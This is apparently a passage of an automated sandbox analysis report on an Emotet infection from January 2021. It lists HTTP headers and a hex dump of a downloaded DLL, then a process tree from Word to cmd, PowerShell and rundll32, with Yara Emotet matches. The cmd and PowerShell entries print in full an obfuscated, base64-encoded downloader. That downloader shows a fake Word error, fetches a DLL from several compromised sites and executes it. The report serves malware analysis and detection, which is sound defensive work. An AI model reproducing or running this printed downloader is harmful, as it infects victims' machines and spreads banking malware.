                                          Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
                                          Content-Transfer-Encoding: binary
                                          Set-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/
                                          Last-Modified: Tue, 26 Jan 2021 23:10:16 GMT
                                          X-XSS-Protection: 1; mode=block
                                          X-Content-Type-Options: nosniff
                                          Content-Type: application/octet-stream
                                          X-Cacheable: YES:Forced
                                          Content-Length: 631808
                                          Accept-Ranges: bytes
                                          Date: Tue, 26 Jan 2021 23:10:16 GMT
                                          Age: 0
                                          Vary: User-Agent
                                          X-Cache: uncached
                                          X-Cache-Hit: MISS
                                          X-Backend: all_requests
                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:00:09:34
                                          Start date:27/01/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13fb80000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:09:35
                                          Start date:27/01/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                          Imagebase:0x4a5a0000
                                          File size:345088 bytes
                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:09:36
                                          Start date:27/01/2021
                                          Path:C:\Windows\System32\msg.exe
                                          Wow64 process (32bit):false
                                          Commandline:msg user /v Word experienced an error trying to open the file.
                                          Imagebase:0xff860000
                                          File size:26112 bytes
                                          MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:09:36
                                          Start date:27/01/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                          Imagebase:0x13ff00000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Start time:00:09:41
                                          Start date:27/01/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0xff900000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:09:42
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:42
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:43
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:44
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
